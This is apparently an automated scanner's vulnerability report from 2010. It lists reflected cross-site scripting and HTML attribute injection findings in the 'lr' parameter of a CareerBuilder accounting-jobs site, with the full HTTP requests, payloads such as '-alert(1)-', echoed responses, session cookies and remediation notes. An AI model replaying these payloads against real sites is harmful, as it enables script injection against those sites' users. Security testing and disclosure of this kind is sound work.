GET /ag.ic/Florida_Miamicca06'%3b229e8665375?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&sc=1&ff=21&excrit=QID=A3853799236048;st=a;use=ALL;TID=0;CTY=Miami;SID=FL;CID=US;ENR=NO;DTP=DRNS;YDI=YES;IND=ALL;PDQ=All;PDQ=All;PAYL=0;PAYH=gt120;POY=NO;ETD=ALL;RE=ALL;MGT=DC;SUP=DC;FRE=30;CHL=ag;QS=sid_unknown;SS=NO;TITL=0;OB=-modifiedint;RAD=30;JQT=RAD;JDV=False;ExpHigh=gt50;ExpLow=0;MaxLowExp=-1 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 193512
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miamicca06';229e8665375:mxdl41=pg=1&sc=1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR8
Date: Sun, 14 Nov 2010 23:17:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miamic ...[SNIP]... <script language="JavaScript"> var googlekw = 'Miamicca06';229E8665375 Accounting Jobs on CareerBuilder.com'; </script> ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58a13"%20a%3db%207e7fcc80efe was submitted in the lr parameter. This input was echoed as 58a13" a=b 7e7fcc80efe in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami?lr=cbcb_mhf48aa58a13"%20a%3db%207e7fcc80efe HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 191257
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:05:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59906'-alert(1)-'795c61b5e19 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami?lr=cbcb_mhf48aa59906'-alert(1)-'795c61b5e19 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 191944
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR4
Date: Sun, 14 Nov 2010 23:06:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa59906'-alert(1)-'795c61b5e19&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f48aa'-alert(1)-'9d78db8d0a5 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190697
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=742b47a46d174153b38634de2ce397ba-343070627-RE-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6502B7EE094B552B2B70BBA9219CA94E77CE10351649902F41F8211398221DB738F2E1EB2D4C61F7C85; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:23:46 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:38:46 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL14
Date: Sun, 14 Nov 2010 22:23:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e36f"%20a%3db%20a374526cf1f was submitted in the lr parameter. This input was echoed as 3e36f" a=b a374526cf1f in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami/?lr=cbcb_mh3e36f"%20a%3db%20a374526cf1f&SiteID=cbcb_mh031 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190052
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=4c1214c5309e47ab9c6e1f3f48696a30-343070602-R8-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6508CD4B507BB40F27D5D49BB4DD41970517DAD82ED8DF2ADD73243653D37836DEF1D333B1CB075ACFF; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:23:22 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:38:22 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL8
Date: Sun, 14 Nov 2010 22:23:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9012c"%20a%3db%20369a2cb1a28 was submitted in the lr parameter. This input was echoed as 9012c" a=b 369a2cb1a28 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Accounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a59012c"%20a%3db%20369a2cb1a28&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196910
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:06:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec784'-alert(1)-'194462e6124 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Accounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5ec784'-alert(1)-'194462e6124&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197437
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR22
Date: Sun, 14 Nov 2010 23:08:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5ec784'-alert(1)-'194462e6124&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c701a'-alert(1)-'781f62259bc was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_AccountsPayable.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c701a'-alert(1)-'781f62259bc&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197657
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR32
Date: Sun, 14 Nov 2010 23:06:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c701a'-alert(1)-'781f62259bc&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1a9"%20a%3db%20e961c1b811c was submitted in the lr parameter. This input was echoed as 9f1a9" a=b e961c1b811c in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_AccountsPayable.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a59f1a9"%20a%3db%20e961c1b811c&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197275
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sun, 14 Nov 2010 23:05:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ba5c'-alert(1)-'68fa7d568e0 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_AccountsReceivable.htm?IPath=OCP&lr=cbcb_mhf48aa7ba5c'-alert(1)-'68fa7d568e0 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190323
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountsreceivable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR14
Date: Sun, 14 Nov 2010 23:14:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa7ba5c'-alert(1)-'68fa7d568e0&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2ee"%20a%3db%20fed0e7e8bc3 was submitted in the lr parameter. This input was echoed as be2ee" a=b fed0e7e8bc3 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_AccountsReceivable.htm?IPath=OCP&lr=cbcb_mhf48aabe2ee"%20a%3db%20fed0e7e8bc3 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 195095
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR1
Date: Sun, 14 Nov 2010 23:11:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7154c'-alert(1)-'d6bb816219f was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Auditing.htm?IPath=OCP&lr=cbcb_mhf48aa7154c'-alert(1)-'d6bb816219f HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190040
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_auditing.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sun, 14 Nov 2010 23:13:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa7154c'-alert(1)-'d6bb816219f&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdbc"%20a%3db%205fc987899df was submitted in the lr parameter. This input was echoed as 2cdbc" a=b 5fc987899df in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Auditing.htm?IPath=OCP&lr=cbcb_mhf48aa2cdbc"%20a%3db%205fc987899df HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189439
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_auditing.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sun, 14 Nov 2010 23:09:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b07c4'-alert(1)-'57936a51b86 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Bookkeeping.htm?IPath=OCP&lr=cbcb_mhf48aab07c4'-alert(1)-'57936a51b86 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190038
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_bookkeeping.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:12:58 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aab07c4'-alert(1)-'57936a51b86&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45eed"%20a%3db%206df7f904442 was submitted in the lr parameter. This input was echoed as 45eed" a=b 6df7f904442 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Bookkeeping.htm?IPath=OCP&lr=cbcb_mhf48aa45eed"%20a%3db%206df7f904442 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189492
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_bookkeeping.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:10:13 GMT
Connection: close
